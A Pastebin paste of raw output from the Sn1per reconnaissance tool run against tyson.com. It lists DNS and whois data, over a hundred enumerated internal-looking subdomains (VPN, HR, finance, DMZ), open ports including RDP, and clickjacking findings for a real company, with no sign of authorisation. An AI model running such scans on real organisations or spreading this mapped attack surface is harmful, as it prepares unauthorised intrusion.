Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- root@kali:~# cd /usr/shared/sniper
- bash: cd: /usr/shared/sniper: No such file or directory
- root@kali:~# cd /user/share/sniper
- bash: cd: /user/share/sniper: No such file or directory
- root@kali:~# cd /usr/share/sniper
- root@kali:/usr/share/sniper# sniper tyson.com
- ____
- _________ / _/___ ___ _____
- / ___/ __ \ / // __ \/ _ \/ ___/
- (__ ) / / // // /_/ / __/ /
- /____/_/ /_/___/ .___/\___/_/
- /_/
- + -- --=[http://crowdshield.com
- + -- --=[sniper v2.4 by 1N3
- + -- ----------------------------=[Running Nslookup]=------------------------ -- +
- Server: 10.110.182.1
- Address: 10.110.182.1#53
- Non-authoritative answer:
- Name: tyson.com
- Address: 65.52.220.144
- tyson.com has address 65.52.220.144
- tyson.com mail is handled by 10 pps1.tyson.com.
- tyson.com mail is handled by 10 pps3.tyson.com.
- tyson.com mail is handled by 10 pps4.tyson.com.
- tyson.com mail is handled by 10 pps5.tyson.com.
- tyson.com mail is handled by 10 pps6.tyson.com.
- tyson.com mail is handled by 10 pps2.tyson.com.
- + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
- Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
- [+] Target is tyson.com
- [+] Loading modules.
- [+] Following modules are loaded:
- [x] [1] ping:icmp_ping - ICMP echo discovery module
- [x] [2] ping:tcp_ping - TCP-based ping discovery module
- [x] [3] ping:udp_ping - UDP-based ping discovery module
- [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
- [x] [5] infogather:portscan - TCP and UDP PortScanner
- [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
- [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
- [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
- [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
- [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
- [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
- [x] [12] fingerprint:smb - SMB fingerprinting module
- [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
- [+] 13 modules registered
- [+] Initializing scan engine
- [+] Running scan engine
- [-] ping:tcp_ping module: no closed/open TCP ports known on 65.52.220.144. Module test failed
- [-] ping:udp_ping module: no closed/open UDP ports known on 65.52.220.144. Module test failed
- [-] No distance calculation. 65.52.220.144 appears to be dead or no ports known
- [+] Host: 65.52.220.144 is down (Guess probability: 0%)
- [+] Cleaning up scan engine
- [+] Modules deinitialized
- [+] Execution completed.
- + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
- Whois Server Version 2.0
- Domain names in the .com and .net domains can now be registered
- with many different competing registrars. Go to http://www.internic.net
- for detailed information.
- Domain Name: TYSON.COM
- Registrar: SAFENAMES LTD
- Sponsoring Registrar IANA ID: 447
- Whois Server: whois.safenames.net
- Referral URL: http://www.safenames.net
- Name Server: NS1.TYSON.COM
- Name Server: NS2.TYSON.COM
- Name Server: NS3.TYSON.COM
- Name Server: NS4.TYSON.COM
- Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
- Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
- Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
- Updated Date: 17-may-2017
- Creation Date: 31-may-1995
- Expiration Date: 30-may-2023
- >>> Last update of whois database: 2017-07-14T20:34:46Z <<<
- For more information on Whois status codes, please visit https://icann.org/epp
- NOTICE: The expiration date displayed in this record is the date the
- registrar's sponsorship of the domain name registration in the registry is
- currently set to expire. This date does not necessarily reflect the expiration
- date of the domain name registrant's agreement with the sponsoring
- registrar. Users may consult the sponsoring registrar's Whois database to
- view the registrar's reported date of expiration for this registration.
- TERMS OF USE: You are not authorized to access or query our Whois
- database through the use of electronic processes that are high-volume and
- automated except as reasonably necessary to register domain names or
- modify existing registrations; the Data in VeriSign Global Registry
- Services' ("VeriSign") Whois database is provided by VeriSign for
- information purposes only, and to assist persons in obtaining information
- about or related to a domain name registration record. VeriSign does not
- guarantee its accuracy. By submitting a Whois query, you agree to abide
- by the following terms of use: You agree that you may use this Data only
- for lawful purposes and that under no circumstances will you use this Data
- to: (1) allow, enable, or otherwise support the transmission of mass
- unsolicited, commercial advertising or solicitations via e-mail, telephone,
- or facsimile; or (2) enable high volume, automated, electronic processes
- that apply to VeriSign (or its computer systems). The compilation,
- repackaging, dissemination or other use of this Data is expressly
- prohibited without the prior written consent of VeriSign. You agree not to
- use electronic processes that are automated and high-volume to access or
- query the Whois database except as reasonably necessary to register
- domain names or modify existing registrations. VeriSign reserves the right
- to restrict your access to the Whois database in its sole discretion to ensure
- operational stability. VeriSign may restrict or terminate your access to the
- Whois database for failure to abide by these terms of use. VeriSign
- reserves the right to modify these terms at any time.
- The Registry database contains ONLY .COM, .NET, .EDU domains and
- Registrars.
- Domain Name: TYSON.COM
- Registry Domain ID: 2232321_DOMAIN_COM-VRSN
- Registrar WHOIS Server: whois.safenames.net
- Registrar URL: http://www.safenames.net
- Updated Date: 2017-05-17T16:48:01Z
- Creation Date: 1995-05-31T04:00:00Z
- Registrar Registration Expiration Date: 2023-05-30T04:00:00Z
- Registrar: Safenames Ltd
- Registrar IANA ID: 447
- Registrar Abuse Contact Email: abuse@safenames.net
- Registrar Abuse Contact Phone: +44.1908200022
- Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
- Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
- Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
- Registry Registrant ID: Not Available From Registry
- Registrant Name: Domain Admin
- Registrant Organisation: Tyson Foods, Inc
- Registrant Street: 2200 W Don Tyson Parkway
- Registrant Street:
- Registrant City: Springdale
- Registrant State/Province: AR
- Registrant Postal Code: 72761
- Registrant Country: US
- Registrant Phone: +1.8006433410
- Registrant Fax:
- Registrant Email: hostmaster@tyson.com
- Registry Admin ID: Not Available From Registry
- Admin Name: International Domain Administrator
- Admin Organisation: Safenames Ltd
- Admin Street: Safenames House, Sunrise Parkway
- Admin Street:
- Admin City: Milton Keynes
- Admin State/Province: Bucks
- Admin Postal Code: MK14 6LS
- Admin Country: UK
- Admin Phone: +44.1908200022
- Admin Fax: +44.1908325192
- Admin Email: hostmaster@safenames.net
- Registry Tech ID: Not Available From Registry
- Tech Name: International Domain Tech
- Tech Organisation: International Domain Tech
- Tech Street: Safenames House, Sunrise Parkway
- Tech Street:
- Tech City: Milton Keynes
- Tech State/Province: Bucks
- Tech Postal Code: MK14 6LS
- Tech Country: UK
- Tech Phone: +44.1908200022
- Tech Fax: +44.1908325192
- Tech Email: tec@safenames.net
- Name Server: NS1.TYSON.COM
- Name Server: NS2.TYSON.COM
- Name Server: NS3.TYSON.COM
- Name Server: NS4.TYSON.COM
- DNSSEC: unsigned
- URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
- >>> Last update of WHOIS database: 2017-05-17T16:48:01Z <<<
- "For more information on Whois status codes, please visit https://icann.org/epp"
- Safenames - Experts in Global Domain Management and Online Brand Protection
- Domain Registration in over 760 different extensions
- Enterprise Domain Management since 1999
- Mark Protect™ Online Brand Monitoring and Enforcement
- Domain Consulting and Strategy
- Domain Name Acquisition
- Domain Disputes and Recovery
- Visit Safenames at www.safenames.net
- +1 703 574 5313 in the US/Canada
- +44 1908 200022 in Europe
- The Data in the Safenames Registrar WHOIS database is provided by Safenames for
- information purposes only, and to assist persons in obtaining information about
- or related to a domain name registration record. Safenames does not guarantee
- its accuracy. Additionally, the data may not reflect updates to billing
- contact information.
- By submitting a WHOIS query, you agree to use this Data only for lawful purposes
- and that under no circumstances will you use this Data to:
- (1) allow, enable, or otherwise support the transmission of mass unsolicited,
- commercial advertising or solicitations via e-mail, telephone, or facsimile; or
- (2) enable high volume, automated, electronic processes that apply to Safenames
- (or its computer systems). The compilation, repackaging, dissemination or
- other use of this Data is expressly prohibited without the prior written
- consent of Safenames. Safenames reserves the right to terminate your access to
- the Safenames Registrar WHOIS database in its sole discretion, including
- without limitation, for excessive querying of the WHOIS database or for failure
- to otherwise abide by this policy. Safenames reserves the right to modify
- these terms at any time. By submitting this query, you agree to abide by this
- policy.
- + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
- *******************************************************************
- * *
- * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
- * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
- * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
- * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
- * *
- * TheHarvester Ver. 2.7 *
- * Coded by Christian Martorella *
- * Edge-Security Research *
- * cmartorella@edge-security.com *
- *******************************************************************
- [-] Searching in Bing:
- Searching 50 results...
- Searching 100 results...
- [+] Emails found:
- ------------------
- No emails found
- [+] Hosts found in search engines:
- ------------------------------------
- [-] Resolving hostnames IPs...
- 69.172.200.241:ir.tyson.com
- 65.52.220.144:projectaplus.tyson.com
- 65.52.220.144:www.tyson.com
- + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
- ; <<>> DiG 9.10.3-P4-Debian <<>> -x tyson.com
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 37910
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags:; udp: 4096
- ;; QUESTION SECTION:
- ;com.tyson.in-addr.arpa. IN PTR
- ;; AUTHORITY SECTION:
- in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017042804 1800 900 604800 3600
- ;; Query time: 62 msec
- ;; SERVER: 10.110.182.1#53(10.110.182.1)
- ;; WHEN: Fri Jul 14 16:36:18 EDT 2017
- ;; MSG SIZE rcvd: 119
- dnsenum.pl VERSION:1.2.3
- ----- tyson.com -----
- Host's addresses:
- __________________
- tyson.com. 803 IN A 65.52.220.144
- Name Servers:
- ______________
- ns1.tyson.com. 172698 IN A 199.66.1.33
- ns2.tyson.com. 172698 IN A 199.66.3.34
- ns3.tyson.com. 172698 IN A 199.66.3.33
- ns4.tyson.com. 172698 IN A 199.66.1.34
- Mail (MX) Servers:
- ___________________
- pps2.tyson.com. 28800 IN A 199.66.1.102
- pps2.tyson.com. 28800 IN A 199.66.3.102
- pps3.tyson.com. 28800 IN A 199.66.1.103
- pps3.tyson.com. 28800 IN A 199.66.3.103
- pps4.tyson.com. 28800 IN A 199.66.1.104
- pps4.tyson.com. 28800 IN A 199.66.3.104
- pps1.tyson.com. 28800 IN A 199.66.1.101
- pps1.tyson.com. 28800 IN A 199.66.3.101
- pps6.tyson.com. 28800 IN A 199.66.3.111
- pps6.tyson.com. 28800 IN A 199.66.1.111
- pps5.tyson.com. 28800 IN A 199.66.3.110
- pps5.tyson.com. 28800 IN A 199.66.1.110
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- Trying Zone Transfer for tyson.com on ns4.tyson.com ...
- AXFR record query failed: REFUSED
- Trying Zone Transfer for tyson.com on ns1.tyson.com ...
- AXFR record query failed: REFUSED
- Trying Zone Transfer for tyson.com on ns3.tyson.com ...
- AXFR record query failed: REFUSED
- Trying Zone Transfer for tyson.com on ns2.tyson.com ...
- AXFR record query failed: REFUSED
- brute force file not specified, bay.
- + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
- ____ _ _ _ _ _____
- / ___| _ _| |__ | (_)___| |_|___ / _ __
- \___ \| | | | '_ \| | / __| __| |_ \| '__|
- ___) | |_| | |_) | | \__ \ |_ ___) | |
- |____/ \__,_|_.__/|_|_|___/\__|____/|_|
- # Coded By Ahmed Aboul-Ela - @aboul3la
- [-] Enumerating subdomains now for tyson.com
- [-] verbosity is enabled, will show the subdomains results in realtime
- [-] Searching now in Baidu..
- [-] Searching now in Yahoo..
- [-] Searching now in Google..
- [-] Searching now in Bing..
- [-] Searching now in Ask..
- [-] Searching now in Netcraft..
- [-] Searching now in DNSdumpster..
- [-] Searching now in Virustotal..
- [-] Searching now in ThreatCrowd..
- [-] Searching now in SSL Certificates..
- [-] Searching now in PassiveDNS..
- Virustotal: is.tyson.com
- Virustotal: talent.tyson.com
- Virustotal: source.tyson.com
- Virustotal: intranet.tyson.com
- Virustotal: sts3a.tyson.com
- Virustotal: hrweb.tyson.com
- Virustotal: ns3.tyson.com
- Virustotal: dialin.tyson.com
- Virustotal: workflow.tyson.com
- Virustotal: ucpool01-webext.tyson.com
- Virustotal: tysonweb.tyson.com
- Virustotal: pps5.tyson.com
- Virustotal: myweb.tyson.com
- Virustotal: mdseg.tyson.com
- Virustotal: operweb.tyson.com
- Virustotal: mobile.tyson.com
- Virustotal: gdsn-images.tyson.com
- Virustotal: finance.tyson.com
- Virustotal: finweb.tyson.com
- Virustotal: ediint2.tyson.com
- Virustotal: ediint1.tyson.com
- Virustotal: content-test.tyson.com
- Virustotal: email.tyson.com
- Virustotal: autodiscover.tyson.com
- Virustotal: hss.tyson.com
- Virustotal: is-test.tyson.com
- Virustotal: sts3.tyson.com
- Virustotal: pps6.tyson.com
- Virustotal: www-stage.tyson.com
- Virustotal: drdesktop.tyson.com
- Virustotal: newsletter.tyson.com
- Virustotal: isweb.tyson.com
- Virustotal: content.tyson.com
- Virustotal: expense.tyson.com
- Virustotal: hungerrelief.tyson.com
- Virustotal: m-projectaplus.tyson.com
- Virustotal: sslvpn-test.tyson.com
- Virustotal: source-test.tyson.com
- Virustotal: ppo.tyson.com
- Virustotal: broilerapp.tyson.com
- Virustotal: creditapp.tyson.com
- Virustotal: ss.tyson.com
- Virustotal: pps4.tyson.com
- Virustotal: pps3.tyson.com
- Virustotal: pps1.tyson.com
- Virustotal: securemail.tyson.com
- Virustotal: pps2a.tyson.com
- Virustotal: sip.tyson.com
- Virustotal: tango.tyson.com
- Virustotal: localgrainservices.tyson.com
- Virustotal: pps2.tyson.com
- Virustotal: meet.tyson.com
- Virustotal: supplierportal.tyson.com
- Virustotal: projectaplus.tyson.com
- Virustotal: m.tyson.com
- Virustotal: sites.tyson.com
- Virustotal: smetrics.tyson.com
- Virustotal: lyncdiscover.tyson.com
- Virustotal: sslvpn.tyson.com
- Virustotal: wwb03.tyson.com
- Virustotal: dredir.tyson.com
- Virustotal: udesign.tyson.com
- Virustotal: meetingplace.tyson.com
- Virustotal: ns04.tyson.com
- Virustotal: ns02.tyson.com
- Virustotal: ns01.tyson.com
- Virustotal: ns03.tyson.com
- Virustotal: wwb02.tyson.com
- Virustotal: ir.tyson.com
- Virustotal: www.tyson.com
- Virustotal: metrics.tyson.com
- ThreatCrowd: pps1.tyson.com
- ThreatCrowd: pps2.tyson.com
- ThreatCrowd: pps3.tyson.com
- ThreatCrowd: pps4.tyson.com
- ThreatCrowd: isweb.tyson.com
- ThreatCrowd: m.tyson.com
- ThreatCrowd: ir.tyson.com
- ThreatCrowd: metrics.tyson.com
- ThreatCrowd: projectaplus.tyson.com
- ThreatCrowd: source-test.tyson.com
- ThreatCrowd: www.tyson.com
- SSL Certificates: source.tyson.com
- SSL Certificates: freshmeats.tyson.com
- SSL Certificates: isweb.tyson.com
- SSL Certificates: awseg-qa.tyson.com
- SSL Certificates: awmanage-qa.tyson.com
- SSL Certificates: mdseg.tyson.com
- SSL Certificates: sip.tyson.com
- SSL Certificates: webconf.tyson.com
- SSL Certificates: manage.tyson.com
- SSL Certificates: activesync-test.tyson.com
- SSL Certificates: autodiscover-test.tyson.com
- SSL Certificates: email-test.tyson.com
- SSL Certificates: mobile-test.tyson.com
- SSL Certificates: creditapp.tyson.com
- SSL Certificates: activate-test.tyson.com
- SSL Certificates: manage-test.tyson.com
- SSL Certificates: sslvpn-test.tyson.com
- SSL Certificates: mobile.tyson.com
- SSL Certificates: scep04.tyson.com
- SSL Certificates: securemail.tyson.com
- SSL Certificates: www.tyson.com
- SSL Certificates: docs.tyson.com
- SSL Certificates: activate.tyson.com
- SSL Certificates: mdmanage.tyson.com
- SSL Certificates: sslvpn.tyson.com
- SSL Certificates: pps6.tyson.com
- SSL Certificates: smetrics.tyson.com
- SSL Certificates: pps3.tyson.com
- SSL Certificates: pps2.tyson.com
- SSL Certificates: pps4.tyson.com
- SSL Certificates: pps1.tyson.com
- SSL Certificates: localgrainservices.tyson.com
- SSL Certificates: ss.tyson.com
- SSL Certificates: dialin.tyson.com
- SSL Certificates: lyncdiscover.tyson.com
- SSL Certificates: meet.tyson.com
- SSL Certificates: ucpool01-webext.tyson.com
- SSL Certificates: ucwebapp01.tyson.com
- SSL Certificates: enterpriseregistration.tyson.com
- SSL Certificates: sts3.tyson.com
- SSL Certificates: Lyncdiscover.tyson.com
- SSL Certificates: lyncweb.tyson.com
- SSL Certificates: activesync.tyson.com
- SSL Certificates: autodiscover.tyson.com
- SSL Certificates: email.tyson.com
- SSL Certificates: partnerweb.tyson.com
- PassiveDNS: Newer Sublist3r doesn't allow underscores in hostnames at places like tyson.com
- PassiveDNS: From http://PTRarchive.com: timtest.tyson.com
- PassiveDNS: From http://PTRarchive.com: vc.tyson.com
- PassiveDNS: From http://PTRarchive.com: sslvpn-test.tyson.com
- PassiveDNS: From http://PTRarchive.com: vnets.tyson.com
- PassiveDNS: From http://PTRarchive.com: ginternet.tyson.com
- PassiveDNS: From http://PTRarchive.com: www.tyson.com
- Bing: hrweb.tyson.com
- Bing: creditapp.tyson.com
- Bing: dialin.tyson.com
- Bing: drdesktop.tyson.com
- Bing: expense.tyson.com
- Bing: localgrainservices.tyson.com
- Bing: ir.tyson.com
- Bing: projectaplus.tyson.com
- Bing: sts3.tyson.com
- Bing: sslvpn.tyson.com
- Bing: broilerapp.tyson.com
- Bing: securemail.tyson.com
- Bing: talent.tyson.com
- Bing: ucpool01-webext.tyson.com
- Bing: sts3a.tyson.com
- Bing: positionstatements.tyson.com
- Bing: hss.tyson.com
- Bing: source-test.tyson.com
- Bing: newsletter.tyson.com
- Bing: meet.tyson.com
- Bing: m.tyson.com
- [!] Error: Google probably now is blocking our requests
- [~] Finished now the Google Enumeration ...
- DNSdumpster: creditapp.tyson.com
- DNSdumpster: dredir.tyson.com
- DNSdumpster: ediintqa.tyson.com
- DNSdumpster: pps3.tyson.com
- DNSdumpster: inttst1.tyson.com
- DNSdumpster: pps6.tyson.com
- DNSdumpster: email-test.tyson.com
- DNSdumpster: mobile-test.tyson.com
- Netcraft: www.tyson.com
- DNSdumpster: mdseg.tyson.com
- DNSdumpster: ediintpr.tyson.com
- DNSdumpster: autodiscover.tyson.com
- DNSdumpster: ftp.tyson.com
- DNSdumpster: com01.tyson.com
- DNSdumpster: meetings.tyson.com
- DNSdumpster: ediinttest1.tyson.com
- DNSdumpster: creditapp-test.tyson.com
- DNSdumpster: officeweb.tyson.com
- DNSdumpster: meet.tyson.com
- DNSdumpster: neovpn.tyson.com
- DNSdumpster: myweb.tyson.com
- DNSdumpster: ns02.tyson.com
- DNSdumpster: dmz04.tyson.com
- DNSdumpster: lyncweb.tyson.com
- DNSdumpster: partnerweb.tyson.com
- DNSdumpster: corp.tyson.com
- DNSdumpster: mdmanage-qa.tyson.com
- DNSdumpster: localgrainservices.tyson.com
- DNSdumpster: av.tyson.com
- DNSdumpster: pps.tyson.com
- DNSdumpster: email.tyson.com
- DNSdumpster: ediint1.tyson.com
- DNSdumpster: mdseg-qa.tyson.com
- DNSdumpster: dl.tyson.com
- DNSdumpster: mdmanage.tyson.com
- DNSdumpster: activesync.tyson.com
- DNSdumpster: pps5.tyson.com
- DNSdumpster: manage-test.tyson.com
- DNSdumpster: pps2.tyson.com
- DNSdumpster: pps4.tyson.com
- DNSdumpster: hod.tyson.com
- DNSdumpster: dmzaix02.tyson.com
- DNSdumpster: ns03.tyson.com
- DNSdumpster: ma-asa.tyson.com
- DNSdumpster: ns01.tyson.com
- DNSdumpster: ginternet.tyson.com
- DNSdumpster: cserv.tyson.com
- DNSdumpster: mobile.tyson.com
- DNSdumpster: lyncdiscover.tyson.com
- DNSdumpster: pps1.tyson.com
- DNSdumpster: ns04.tyson.com
- [-] Saving results to file: /usr/share/sniper/loot/domains/domains-tyson.com.txt
- [-] Total Unique Subdomains Found: 122
- Newer Sublist3r doesn't allow underscores in hostnames at places like tyson.com
- www.tyson.com
- Lyncdiscover.tyson.com
- activate.tyson.com
- activate-test.tyson.com
- activesync.tyson.com
- activesync-test.tyson.com
- autodiscover.tyson.com
- autodiscover-test.tyson.com
- av.tyson.com
- awmanage-qa.tyson.com
- awseg-qa.tyson.com
- broilerapp.tyson.com
- com01.tyson.com
- From http://PTRarchive.com: ginternet.tyson.com
- From http://PTRarchive.com: sslvpn-test.tyson.com
- From http://PTRarchive.com: timtest.tyson.com
- From http://PTRarchive.com: vc.tyson.com
- From http://PTRarchive.com: vnets.tyson.com
- From http://PTRarchive.com: www.tyson.com
- content.tyson.com
- content-test.tyson.com
- corp.tyson.com
- creditapp.tyson.com
- creditapp-test.tyson.com
- cserv.tyson.com
- dialin.tyson.com
- dl.tyson.com
- dmz04.tyson.com
- dmzaix02.tyson.com
- docs.tyson.com
- drdesktop.tyson.com
- dredir.tyson.com
- ediint1.tyson.com
- ediint2.tyson.com
- ediintpr.tyson.com
- ediintqa.tyson.com
- ediinttest1.tyson.com
- email.tyson.com
- email-test.tyson.com
- enterpriseregistration.tyson.com
- expense.tyson.com
- finance.tyson.com
- finweb.tyson.com
- freshmeats.tyson.com
- ftp.tyson.com
- gdsn-images.tyson.com
- ginternet.tyson.com
- hod.tyson.com
- hrweb.tyson.com
- hss.tyson.com
- hungerrelief.tyson.com
- intranet.tyson.com
- inttst1.tyson.com
- ir.tyson.com
- is.tyson.com
- is-test.tyson.com
- isweb.tyson.com
- localgrainservices.tyson.com
- lyncdiscover.tyson.com
- lyncweb.tyson.com
- m.tyson.com
- m-projectaplus.tyson.com
- ma-asa.tyson.com
- manage.tyson.com
- manage-test.tyson.com
- mdmanage.tyson.com
- mdmanage-qa.tyson.com
- mdseg.tyson.com
- mdseg-qa.tyson.com
- meet.tyson.com
- meetingplace.tyson.com
- meetings.tyson.com
- metrics.tyson.com
- mobile.tyson.com
- mobile-test.tyson.com
- myweb.tyson.com
- neovpn.tyson.com
- newsletter.tyson.com
- ns01.tyson.com
- ns02.tyson.com
- ns03.tyson.com
- ns04.tyson.com
- ns3.tyson.com
- officeweb.tyson.com
- operweb.tyson.com
- partnerweb.tyson.com
- positionstatements.tyson.com
- ppo.tyson.com
- pps.tyson.com
- pps1.tyson.com
- pps2.tyson.com
- pps2a.tyson.com
- pps3.tyson.com
- pps4.tyson.com
- pps5.tyson.com
- pps6.tyson.com
- projectaplus.tyson.com
- scep04.tyson.com
- securemail.tyson.com
- sip.tyson.com
- sites.tyson.com
- smetrics.tyson.com
- source.tyson.com
- source-test.tyson.com
- ss.tyson.com
- sslvpn.tyson.com
- sslvpn-test.tyson.com
- sts3.tyson.com
- sts3a.tyson.com
- supplierportal.tyson.com
- talent.tyson.com
- tango.tyson.com
- tysonweb.tyson.com
- ucpool01-webext.tyson.com
- ucwebapp01.tyson.com
- udesign.tyson.com
- webconf.tyson.com
- workflow.tyson.com
- wwb02.tyson.com
- wwb03.tyson.com
- www-stage.tyson.com
- ╔═╗╦═╗╔╦╗╔═╗╦ ╦
- ║ ╠╦╝ ║ ╚═╗╠═╣
- ╚═╝╩╚═ ╩o╚═╝╩ ╩
- + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
- activate-test.tyson.com
- activate.tyson.com
- activesync-test.tyson.com
- activesync.tyson.com
- autodiscover-test.tyson.com
- autodiscover.tyson.com
- awmanage-qa.tyson.com
- awseg-qa.tyson.com
- creditapp.tyson.com
- dialin.tyson.com
- docs.tyson.com
- email-test.tyson.com
- email.tyson.com
- enterpriseregistration.tyson.com
- freshmeats.tyson.com
- isweb.tyson.com
- localgrainservices.tyson.com
- lyncdiscover.tyson.com
- Lyncdiscover.tyson.com
- lyncweb.tyson.com
- manage-test.tyson.com
- manage.tyson.com
- mdmanage.tyson.com
- mdseg.tyson.com
- meet.tyson.com
- mobile-test.tyson.com
- mobile.tyson.com
- partnerweb.tyson.com
- pps1.tyson.com
- pps2.tyson.com
- pps3.tyson.com
- pps4.tyson.com
- pps6.tyson.com
- scep04.tyson.com
- securemail.tyson.com
- sip.tyson.com
- smetrics.tyson.com
- source.tyson.com
- sslvpn-test.tyson.com
- sslvpn.tyson.com
- ss.tyson.com
- sts3.tyson.com
- ucpool01-webext.tyson.com
- ucwebapp01.tyson.com
- webconf.tyson.com
- www.tyson.com
- [+] Domains saved to: /usr/share/sniper/loot/domains/domains-tyson.com-full.txt
- + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
- ; <<>> DiG 9.10.3-P4-Debian <<>> drdesktop.tyson.com CNAME
- ;drdesktop.tyson.com. IN CNAME
- + -- ----------------------------=[Checking Email Security]=----------------- -- +
- + -- ----------------------------=[Pinging host]=---------------------------- -- +
- PING tyson.com (65.52.220.144) 56(84) bytes of data.
- --- tyson.com ping statistics ---
- 1 packets transmitted, 0 received, 100% packet loss, time 0ms
- + -- ----------------------------=[Running TCP port scan]=------------------- -- +
- Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-14 16:41 EDT
- Nmap scan report for tyson.com (65.52.220.144)
- Host is up (0.066s latency).
- Not shown: 42 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 80/tcp open http
- 443/tcp open https
- 3389/tcp open ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 15.47 seconds
- + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
- + -- --=[Port 21 closed... skipping.
- + -- --=[Port 22 closed... skipping.
- + -- --=[Port 23 closed... skipping.
- + -- --=[Port 25 closed... skipping.
- + -- --=[Port 53 closed... skipping.
- + -- --=[Port 79 closed... skipping.
- + -- --=[Port 80 opened... running tests...
- + -- ----------------------------=[Checking for WAF]=------------------------ -- +
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://tyson.com
- Generic Detection results:
- The site http://tyson.com seems to be behind a WAF or some sort of security solution
- Reason: The server returned a different response code when a string trigged the blacklist.
- Normal response code is "301", while the response code to an attack is "302"
- Number of requests: 16
- + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
- http://tyson.com [301 Moved Permanently] Country[UNITED STATES][US], HTTPServer[Microsoft-IIS/8.0], IP[65.52.220.144], Microsoft-IIS[8.0], RedirectLocation[http://www.tyson.com/], Title[Document Moved], X-Powered-By[ASP.NET]
- http://www.tyson.com/ [200 OK] ASP_NET[4.0.30319][MVC5.1], Country[UNITED STATES][US], HTML5, HTTPServer[Microsoft-IIS/8.0], IP[65.52.220.144], JQuery, Microsoft-IIS[8.0], Script[text/javascript], Title[Tyson | Home], UncommonHeaders[x-aspnetmvc-version], X-Powered-By[ASP.NET], X-UA-Compatible[IE=edge]
- __ ______ _____
- \ \/ / ___|_ _|
- \ /\___ \ | |
- / \ ___) || |
- /_/\_|____/ |_|
- + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
- + -- --=[Target: tyson.com:80
- + -- --=[Site not vulnerable to Cross-Site Tracing!
- + -- --=[Site not vulnerable to Host Header Injection!
- + -- --=[Site vulnerable to Cross-Frame Scripting!
- + -- --=[Site vulnerable to Clickjacking!
- HTTP/1.1 301 Moved Permanently
- Content-Type: text/html; charset=UTF-8
- Location: http://www.tyson.com/
- Server: Microsoft-IIS/8.0
- X-Powered-By: ASP.NET
- Date: Fri, 14 Jul 2017 20:42:34 GMT
- Content-Length: 144
- <head><title>Document Moved</title></head>
- <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.tyson.com/">here</a></body>
- HTTP/1.1 301 Moved Permanently
- Content-Type: text/html; charset=UTF-8
- Location: http://www.tyson.com/
- Server: Microsoft-IIS/8.0
- X-Powered-By: ASP.NET
- Date: Fri, 14 Jul 2017 20:42:34 GMT
- Content-Length: 144
- <head><title>Document Moved</title></head>
- <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.tyson.com/">here</a></body>
- + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
- + -- --=[Checking if X-Content options are enabled on tyson.com...
- + -- --=[Checking if X-Frame options are enabled on tyson.com...
- + -- --=[Checking if X-XSS-Protection header is enabled on tyson.com...
- + -- --=[Checking HTTP methods on tyson.com...
- + -- --=[Checking if TRACE method is enabled on tyson.com...
- + -- --=[Checking for META tags on tyson.com...
- + -- --=[Checking for open proxy on tyson.com...
- + -- --=[Enumerating software on tyson.com...
- Server: Microsoft-IIS/8.0
- X-Powered-By: ASP.NET
- + -- --=[Checking if Strict-Transport-Security is enabled on tyson.com...
- + -- --=[Checking for Flash cross-domain policy on tyson.com...
- <head><title>Document Moved</title></head>
- <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.tyson.com/crossdomain.xml">here</a></body>
- + -- --=[Checking for Silverlight cross-domain policy on tyson.com...
- <head><title>Document Moved</title></head>
- <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.tyson.com/clientaccesspolicy.xml">here</a></body>
- + -- --=[Checking for HTML5 cross-origin resource sharing on tyson.com...
